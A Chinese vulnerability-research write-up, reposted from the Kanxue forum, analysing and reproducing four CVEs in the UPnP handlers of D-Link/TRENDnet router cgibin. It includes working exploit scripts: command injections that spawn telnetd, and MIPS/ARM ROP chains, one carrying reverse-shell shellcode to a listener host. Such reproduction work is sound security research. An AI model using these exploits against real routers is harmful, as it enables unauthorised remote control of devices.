cgibin中与upnp协议有关的一些漏洞分析与复现
2022-6-13 18:1:46 Author: mp.weixin.qq.com(查看原文) 阅读量:80 收藏


本文为看雪论坛精华文章
看雪论坛作者ID:winmt


前言

UPNP协议

UPNP,全称为:Universal Plug and Play,中文为:通用即插即用,是一套基于TCP/IP、UDP和HTTP的网络协议。

简单来说,就和它的名字一样,UPNP的目的就是为了在某个设备接入网络后,该网络中的所有设备都知道有新设备加入,这些设备之间能互相沟通,甚至可直接使用或控制对方。

UPNP的一大亮点就是,只要某设备支持并开启了UPNP,当主机向其发出端口映射请求的时候,该设备就会自动为主机分配端口并进行端口映射。

cgibin

在D-Link,TRENDnet等apache struct的路由器的/htdocs目录下都存在一个cgibin二进制文件,它会有很多.cgi文件的软链接,通过运行这些软链接,其名字会作为第一个参数传入cgibin,就会调用到cgibin中对应的函数。

cgibin会作为 “请求验证文件” ,对用户的请求进行验证并解析,再将解析后的数据传给对应的文件,进行下一步的操作。

upnp相关的cgi

下图为UPNP协议栈的结构示意图:

可以看到其中的 SSDP(简单服务发现协议),SOAP(简单对象访问协议)与GENA(通用事件通知体系) ,其分别对应ssdpcgi(在/htdocs/upnp目录下),soap.cgi(在/htdocs/upnp/docs/LAN-1目录下),gena.cgi(在/htdocs/upnp/docs/LAN-1目录下),本文也主要是分析这几个cgi在cgibin中对应函数的漏洞。

FAP (firmware-analysis-plus)

由于牵涉到UPNP协议,用qemu来模拟是比较复杂的,需要手动初始化一些东西,因此笔者为了方便,选择使用FAP来仿真模拟固件运行,这个平台基于firmadyne,对其做了一些优化及改进,GitHub的项目地址为:firmware-analysis-plus(https://github.com/liyansong2018/firmware-analysis-plus)。

该平台的优点是:可以做到一键仿真模拟固件运行,缺点是:适配性较差,最好在Kali上安装使用,笔者所用的物理机是Kali 2021.11的版本。

此外,经过笔者测试,该平台对大部分MIPS架构的固件模拟都没有问题,但是对部分ARM架构(特别是D-Link系列高版本路由)的固件模拟好像会出一些问题。

关于ARM无法成功仿真模拟的问题,笔者已经在github上提交了issue咨询了作者,并且得到了回复:

笔者后来又找到了另一个优秀的“固件仿真框架”EMUX,这是一个基于docker的框架,主要针对于arm架构的仿真模拟,近期也支持了mips架构,根据官方的描述,可以对DIR860以上的arm架构路由进行模拟运行。

2022.5.7更新:

这篇文章其实是挺久前写的了,昨天刚发出来,今天就收到了FAP项目作者的回复,说是已经修复了D-Link系列高版本arm路由无法仿真的问题:

笔者立即测试了一下,的确是修复了该问题,接着,笔者又尝试用FAP模拟运行了TP-Link,Tenda等品牌中多款arm的固件,都能够成功。

从目前各方面综合来看,FAP项目是仿真模拟IoT固件的极好的选择。

注:以下复现的CVE所影响的路由器为D-Link DIR-859及以下的版本,以及部分D-Link DIR-859以上的较低小版本,TRENDnet的很多路由器因框架相同,也受其影响。


CVE-2020-15893

漏洞信息:CVE-2020-15893(https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15893

这个CVE与ssdpcgi有关,我们先来分析cgibin中的ssdpcgi_main函数,可以很轻松地定位到可能的漏洞点在LABEL_17这里:

进入lxmldbc_system函数:

可以看到这里是用vsnprintf对传进来的格式化字符串进行了拼接,其中va是通过va_arg取当前栈上的元素组成的va_list,通过动态调试不难发现,这里取的栈上的元素就是存放在栈上的环境变量:

在真机环境中,这里只有HTTP_ST是我们可控的。

当我们向HTTP_ST注入恶意指令,那么拼接好的字符串v6作为system参数,就可以导致任意命令执行(RCE)漏洞了。

再回到ssdpcgi_main详细分析一下该如何构造payload:

可以发现,进行一堆匹配验证,最后的格式化字符串只有下面两个会多出一个参数%s的拼接,我们再看到汇编:

这里的第二个参数为/etc/scripts/upnp/M-SEARCH.sh,第三四个参数可以往上查找到,分别是REMOTE_ADDR和REMOTE_PORT:

结合格式化字符串,可以猜测并通过动调验证出,最后在lxmldbc_system函数中拼接好的system的参数应为 /etc/scripts/upnp/M-SEARCH.sh XXX REMOTE_ADDR:REMOTE_PORT SERVER_ID HTTP_ST & ,因此,想要造成RCE,也就是要让HTTP_ST拼接上去,就必须要选用后面两个格式化字符串(device和service),也就需要之前有urn:才行。

综上,我们初步构造的payload可以是向HTTP_ST注入urn:device:;telnetd -p 8888,由于此busybox自带了telnetd,这里用telnetd开一个端口,再从主机远程登陆进去是最方便的。

我们知道ssdpcgi和UPNP协议有关,也就是要发送报文到UPNP相关的端口,所以先用FAP模拟运行起固件,然后打开/var/run/httpd.conf文件,可以找到:

也就是说,要向1900端口发送报文,才能走到ssdpcgi。

然而,发送一段报文,肯定是需要请求方式的,在cgibin中不好直接看出来,可以到/usr/sbin/upnp文件中去找ST字段的关键词定位:

可以看到sub_41BFDC函数中有对其的操作,再交叉引用到调用sub_41BFDC的sub_41C2A0函数,这里要求我们的请求方式是M-SEARCH:

上图中的v10是调用ILibParsePacketHeader对a1 + 108的数据包解析的结果,而a1 + 108是接收到的socket套接字储存的地方:

在sub_415C9C中也可以看到,把socket绑定到了1900端口:

再回到有对ST字段进行匹配操作的sub_41BFDC函数,可以看到首先需要绕过下面圈出的判断,这里的1.1显然就是HTTP版本:

综上,从upnp二进制文件中可以看到,我们得是M-SEARCH请求方式,故:报文头应为M-SEARCH * HTTP/1.1。

POC:

# python3from socket import *from os import *from time import * payload = b'M-SEARCH * HTTP/1.1\r\n'payload += b'HOST:localhost:1900\r\n'payload += b'ST:urn:device:;telnetd -p 8888\r\n\r\n' s = socket(AF_INET, SOCK_DGRAM, 0)s.sendto(payload, ("192.168.10.1", 1900))s.close() sleep(1)system("telnet 192.168.10.1 8888")

最终成功开启了8888端口,利用telnet远程登陆到了路由器固件中,可执行任意命令:

通过ps命令查看进程,可以发现telnetd -p 8888命令的确已经被成功执行:


CVE-2019-17621

漏洞信息:CVE-2019-17621(https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17621

这个漏洞与gena.cgi有关,还是先看到cgibin中的genacgi_main函数:

可以看到v5是service=后面的内容,再先看到SUBCRIBE请求方式对应的sub_41A390函数:

看到这里,拼接好的字符串v16作为了xmldbc_ephp的参数,xmldbc_ephp函数在这里显然就是运行了/htdocs/upnp/run.NOTIFY.php文件,于是,我们再来分析这个文件:

当SID为空的时候,调用了GENA_subscribe_new函数,这个函数在/htdocs/upnpinc/gena.php中:

这里有对HOST的检查,然后最后调用到了GENA_notify_init函数:

在最后,将$shell_file写入了shell文件中,不难想到,可以通过控制shell_file达成任意命令执行。

再看回到sub_41A390函数中,既然HTTP_SID必须为空才能走到漏洞点,那么自然就走到了else分支:

这些检查都需要绕过,才能走到xmldbc_ephp函数:

这里的SHELL_FILE中可控参数a1就是从genacgi_main传进来的参数v5,也就是service=后面的内容。

综上,可以通过对service注入恶意指令,造成RCE漏洞 。

至此,我们知道了报文的请求方式得是SUBSCRIBE才能触发漏洞,至于UNSUBSCRIBE和SID不为空的情况可以自行审一遍代码,很容易看出是行不通的。

接下来要做的就是找的对应的UPNP端口,先找gena.cgi在哪里,看到/etc/services/HTTP/httpsvcs.php文件:

这里将cgibin的软链接建到了/var/htdocs/upnp/目录下,而这个目录也有软链接,为/htdocs/upnp/docs:

得到了这些信息,再看到/var/run/httpd.conf文件:

可以看到,需要向49152端口发送报文。

POC:

from pwn import *from socket import *from os import *from time import * request = b"SUBSCRIBE /gena.cgi?service=" + b"`telnetd -p 7777`" + b" HTTP/1.1\r\n"request += b"Host: localhost:49152\r\n"request += b"Callback: http:///\r\n"request += b"NT: upnp:event\r\n"request += b"Timeout: Second-2333\r\n\r\n" s = socket(AF_INET, SOCK_STREAM)s.connect((gethostbyname("192.168.0.1"), 49152))s.send(request) #io = remote("192.168.0.1", 49152)#io.send(request) sleep(1)os.system('telnet 192.168.0.1 7777')

这里拿socket或pwntools来打都是OK的:

或者直接nc上49152端口手动发送报文:


CVE-2018-6530

漏洞信息:CVE-2018-6530(https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6530

这个漏洞是在soap.cgi中的,还是看到cgibin中的soapcgi_main函数:

首先需要绕过一些检查,比如CONTENT_TYPE得是text/xml,REQUEST_METHOD得是POST,HTTP_SOAPACTION中得有#等,可以看到这里对service后的内容已经进行了一些过滤,但是 貌似忘记过滤了&符号 。

接着往下看:

这里的cgibin_parse_request已经很熟悉了,就是对POST内容的解析,在这里用处不大,就注意设置一下相关环境变量即可。

再下面就来到漏洞点了:

这个fopen的第二个参数是a+,文件不存在就会创建,所以这个if很好判断过,下面的sprintf + system很显然存在一个任意命令执行的RCE漏洞。

之前说过,&忘记过滤了,因此我们可以用&&连接恶意命令并注入到service中,由于之前的sh /var/run/是个合法路径,因此算执行成功,可以走到&&之后的恶意命令。

在上一个CVE中已经分析过了,soap.cgi也是通过49152端口发送报文给UPNP的 。

POC:

from socket import *from os import *from time import * request = b"POST /soap.cgi?service=&&telnetd -p 8888&& HTTP/1.1\r\n"request += b"Host: localhost:49152\r\n"request += b"Content-Type: text/xml\r\n"request += b"Content-Length: 88\r\n"request += b"SOAPAction: a#b\r\n\r\n" s = socket(AF_INET, SOCK_STREAM)s.connect((gethostbyname("192.168.0.1"), 49152))s.send(request) sleep(1)system('telnet 192.168.0.1 8888')


CVE-2022-25106

漏洞信息:CVE-2022-25106(https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25106

这个漏洞仍然是在gena.cgi中,不过这次是存在缓冲区溢出的漏洞:

上图是当为UNSUBSCRIBE请求方式时走到的函数,很容易看出存在一处栈溢出的漏洞,且当请求方式为SUBSCRIBE时,也存在同样的栈溢出漏洞。

需要提一下的就是,这里的SERVER_ID环境变量可以从httpd.conf文件中看到:

这个环境变量本身就不为空,也不是我们可控的,在这个栈溢出漏洞中,我们可以对service或HTTP_SID进行payload的注入,进行漏洞利用或造成拒绝服务。

这里需要注意的是:用FAP启动好固件后,需要用echo 0 > /proc/sys/kernel/randomize_va_space命令关闭地址随机化(ASLR),因为在真机环境中就是没开ASLR的,也方便我们接下来的复现:

POC-1:

用UNSUBSCRIBE的请求方式,对service进行了注入。

# python3from pwn import *from socket import *from os import *from time import *context(os = 'linux', arch = 'mips') libc_base = 0x2aaf8000 s = socket(AF_INET, SOCK_STREAM) cmd = b'telnetd -l /bin/sh;'payload = b'a'*462payload += p32(libc_base + 0x53200 - 1) # s0  system_addr - 1payload += p32(libc_base + 0x169C4) # s1  addiu $s2, $sp, 0x18 (=> jalr $s0)payload += b'a'*4 # fppayload += p32(libc_base + 0x32A98) # ra  addiu $s0, 1 (=> jalr $s1)payload += b'a'*0x18 # paddingpayload += cmd msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"msg += b"Host: localhost:49152\r\n"msg += b"SID: 1\r\n\r\n" s.connect((gethostbyname("192.168.10.1"), 49152))s.send(msg) sleep(1)system("telnet 192.168.10.1 23")

成功地远程登陆到了路由固件中:

检测到23号端口的telnet服务已被开启:

POC-2:

这个脚本在firmadyne模拟的环境中是打不通的,原因未知,可能是shellcode过长,到了一些不可执行区,但是在真机环境是可以打通的。

这里用的是SUBSCRIBE的请求方式,对service进行了注入。

# python3from pwn import *from socket import *from os import *from time import *context(os = 'linux', arch = 'mips') libc_base = 0x2aaf8000 s = socket(AF_INET, SOCK_STREAM) payload = b'a'*449payload += b'a'*4 # s0payload += p32(libc_base + 0x3E874) # s1  move $t9, $s2 (=> lw... => jr $t9)payload += p32(libc_base + 0x56BD0) # s2  sleeppayload += b'a'*(4*5)payload += p32(libc_base + 0x57E50) # ra  li $a0, 1 (=> jalr $s1) payload += b'a'*0x18payload += b'a'*4 # s0payload += p32(libc_base + 0x37E6C) # s1  move  $t9, $a1 (=> jr $t9)payload += b'a'*4 # s2payload += p32(libc_base + 0xB814) # ra  addiu $a1, $sp, 0x18 (=> jalr $s1) shellcode = asm('''    slti $a0, $zero, 0xFFFF    li $v0, 4006    syscall 0x42424     slti $a0, $zero, 0x1111    li $v0, 4006    syscall 0x42424     li $t4, 0xFFFFFFFD    not $a0, $t4    li $v0, 4006    syscall 0x42424     li $t4, 0xFFFFFFFD    not $a0, $t4    not $a1, $t4    slti $a2, $zero, 0xFFFF    li $v0, 4183    syscall 0x42424     andi $a0, $v0, 0xFFFF    li $v0, 4041    syscall 0x42424    li $v0, 4041    syscall 0x42424     lui $a1, 0xB821 # Port: 8888    ori $a1, 0xFF01    addi $a1, $a1, 0x0101    sw $a1, -8($sp)     li $a1, 0x68FAA8C0 # IP: 192.168.250.104    sw $a1, -4($sp)    addi $a1, $sp, -8     li $t4, 0xFFFFFFEF    not $a2, $t4    li $v0, 4170    syscall 0x42424     lui $t0, 0x6962    ori $t0, $t0,0x2f2f    sw $t0, -20($sp)     lui $t0, 0x6873    ori $t0, 0x2f6e    sw $t0, -16($sp)     slti $a3, $zero, 0xFFFF    sw $a3, -12($sp)    sw $a3, -4($sp)     addi $a0, $sp, -20    addi $t0, $sp, -20    sw $t0, -8($sp)    addi $a1, $sp, -8     addiu $sp, $sp, -20     slti $a2, $zero, 0xFFFF    li $v0, 4011    syscall 0x42424''')payload += b'a'*0x18payload += shellcode msg = b"SUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"msg += b"Host: localhost:49152\r\n"msg += b"SID: 1\r\n"msg += b"Timeout: Second-2333\r\n\r\n" s.connect((gethostbyname("192.168.250.1"), 49152))s.send(msg)

POC-3:

发现DIR-860L v2.03竟然还存在这个漏洞,于是也打了一下,这里注入的是HTTP_SID,又由于uClibc版本换了,所以gadget也有些变化:

# python3from pwn import *from socket import *from os import *from time import *context(os = 'linux', arch = 'mips') libc_base = 0x2aabf000 s = socket(AF_INET, SOCK_STREAM) cmd = b'telnetd -p 8888;'payload = b'a'*437payload += b'a'*4 # s0payload += p32(libc_base + 0x398A4) # s1  move $a0, $s4 ... jalr $fppayload += p32(libc_base + 0x56C20) # fp  systempayload += p32(libc_base + 0x3B2B0) # ra  addiu $s4, $sp, 0x28 ... jalr $s1payload += b'a'*0x28 # paddingpayload += cmd msg = b"UNSUBSCRIBE /gena.cgi?service=0 HTTP/1.1\r\n"msg += b"Host: localhost:49152\r\n"msg += b"SID: " + payload + b"\r\n\r\n" s.connect((gethostbyname("192.168.0.1"), 49152))s.send(msg) sleep(1)system("telnet 192.168.0.1 8888")

POC-4:

发现DIR-880L v1.0虽然架构换成了armel,但是这个漏洞仍然是存在的。

不过,FAP对部分arm架构的固件的仿真运行有些问题,笔者也还不太会用EMUX,没成功启动固件,目前又没有真机的测试条件,就先贴一下POC(这里的gadget在本地的qemu测试过,是可以跑通的):

2022.5.7更新:FAP项目作者已经修复了D-LINK系列高版本arm路由无法仿真模拟的问题,下面给出的是最终测试通过的POC。

# python3from pwn import *from socket import *from os import *from time import *context(os = 'linux', arch = 'arm') libc_base = 0xb6f7e000 s = socket(AF_INET, SOCK_STREAM) cmd = b'telnetd -l /bin/sh;'payload = b'a'*462payload += b'a'*4 # r4payload += b'a'*4 # r5payload += b'a'*4 # r11payload += p32(libc_base + 0x169a0) # pop {r2, r3, r4, pc};payload += b'a'*4payload += p32(libc_base + 0x406f8) # mov r0, r1; pop {r3, pc};payload += b'a'*4payload += p32(libc_base + 0x390fc) # pc add r1, sp, #0x2c; blx r3;payload += b'a'*4 # r3payload += p32(libc_base + 0x5a270) # pc systempayload += b'a'*(0x2c-8) # paddingpayload += cmd msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"msg += b"Host: localhost:49152\r\n"msg += b"SID: 1\r\n\r\n" s.connect((gethostbyname("192.168.0.1"), 49152))s.send(msg) sleep(1)system("telnet 192.168.0.1 23")

看雪ID:winmt

https://bbs.pediy.com/user-home-949925.htm

*本文由看雪论坛 winmt 原创,转载请注明来自看雪社区

# 往期推荐

1.Android APP漏洞之战——调试与反调试详解

2.Fuzzm: 针对WebAssembly内存错误的模糊测试

3.0rays战队2021圣诞校内招新赛题解

4.2022腾讯游戏安全初赛一题解析

5.一文读懂PE文件签名并手工验证签名有效性

6.CNVD-2018-01084 漏洞复现报告(service.cgi 远程命令执行漏洞)

球分享

球点赞

球在看

点击“阅读原文”,了解更多!


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458452267&idx=1&sn=1485f8a3c82d0f4e175e5574016311d0&chksm=b18e31a186f9b8b7c793f36dd47b8027f896de18b0001f5bf7951e9378649d9590b99ea05eb9#rd
如有侵权请联系:admin#unsafe.sh